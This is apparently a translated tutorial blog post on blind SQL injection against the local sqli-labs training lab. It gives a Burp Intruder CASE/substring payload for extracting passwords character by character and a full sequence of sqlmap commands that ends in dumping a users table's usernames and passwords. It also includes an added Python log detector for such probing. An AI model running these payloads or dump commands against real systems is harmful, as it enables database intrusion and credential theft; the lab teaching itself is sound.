[Running SQL blind injection with tools]
2022-07-03 04:38:00 【Black zone (rise)】
Contents
1. (Tool) Running blind injection with Burp
1.2 Method 2: Brute-forcing with an injected statement
2. (Tool) Running Boolean blind injection with sqlmap
Step 1: Detect whether injection exists
Step 2: Enumerate database names
Step 3: Enumerate table names
1. (Tool) Running blind injection with Burp
1.1 Method 1: Brute force
After capturing the request, send it to the "Intruder" module
Configure 2 payload sets
1.2 Method 2: Brute-forcing with an injected statement
Construct the injection statement and iterate over the two payload positions (marked with §)
(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)
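From the defender's side, the statement above leaves a recognizable trace in web access logs: one client repeating the same one-character substring(..., N, 1) comparison with many different offsets N. The Python sketch below is an added example, not code from the original post; the log format, client addresses, the /search path, the threshold and the function names are assumptions, and the sample log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# The page's statement, with the two Intruder positions as format fields.
PAGE_STATEMENT = ("(select case when '{ch}' = lower(substring((select password "
                  "from employees where empid=1),{pos},1)) then 1 else 0 end)")

REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')
# substring/substr/mid(<expr>, N, 1): a one-character read at offset N.
PROBE = re.compile(r"(?:substring|substr|mid)\s*\(.*?,\s*(\d+)\s*,\s*1\s*\)",
                   re.I | re.S)

def sample_log():
    """Constructed access-log lines (assumed combined log format)."""
    ts = "[03/Jul/2022:04:30:0{} +0000]"
    benign = quote("substring(name,1,1)")
    lines = [f'10.0.0.9 - - {ts.format(0)} "GET /Less-5/?id=1 HTTP/1.1" 200 512',
             f'10.0.0.9 - - {ts.format(1)} "GET /search?q={benign} HTTP/1.1" 200 90']
    for pos in range(1, 6):
        q = quote(PAGE_STATEMENT.format(ch="a", pos=pos))
        lines.append(f'10.0.0.5 - - {ts.format(pos)} '
                     f'"GET /Less-5/?id={q} HTTP/1.1" 200 512')
    return lines

def find_blind_extraction(lines, min_positions=4):
    """Return {client: sorted offsets} for clients probing many offsets."""
    seen = defaultdict(set)
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, target = m.groups()
        # Decode the URL first so encoded parentheses and commas are visible.
        for pos in PROBE.findall(unquote_plus(target)):
            seen[client].add(int(pos))
    return {c: sorted(p) for c, p in seen.items() if len(p) >= min_positions}

if __name__ == "__main__":
    for client, offsets in find_blind_extraction(sample_log()).items():
        print(f"{client}: one-character reads at offsets {offsets}")
```

Payloads carried in a POST body or a header do not appear in a standard access log, so this check only covers query-string parameters.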
2. (Tool) Running Boolean blind injection with sqlmap
2.1 Commands:
-u Specify the injection point (target URL)
--dbs Enumerate database names
--tables Enumerate table names
--columns Enumerate column names
--dump Dump the data
After each stage has been enumerated, add -D to specify the database, -T to specify the table and -C to specify the columns, in turn
2.2 Usage process:
Step 1: Detect whether injection exists
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --batch
--batch uses the default answers for all prompts
In fact, the scan has already identified the environment,
so you can add --dbms mysql
Step 2: Enumerate database names
command
# Get all databases
sqlmap.py -u url --dbs --batch
---------
# Get the current database
sqlmap.py -u url --current-db --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch
Step 3: Enumerate table names
command
python sqlmap.py -u url -D DB --tables --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch
Step 4: Enumerate column names
command:
sqlmap.py -u url -D DB -T TBL --columns --batch
Basic operation
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch
Step 5: Dump data
command:
sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch
Basic operation:
python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch
3. Recommended reading
[SQL injection - no echo] Boolean blind injection: principles, functions, exploitation process
[SQL injection - with echo] DNS request injection: principles, platforms, exploitation process, configuration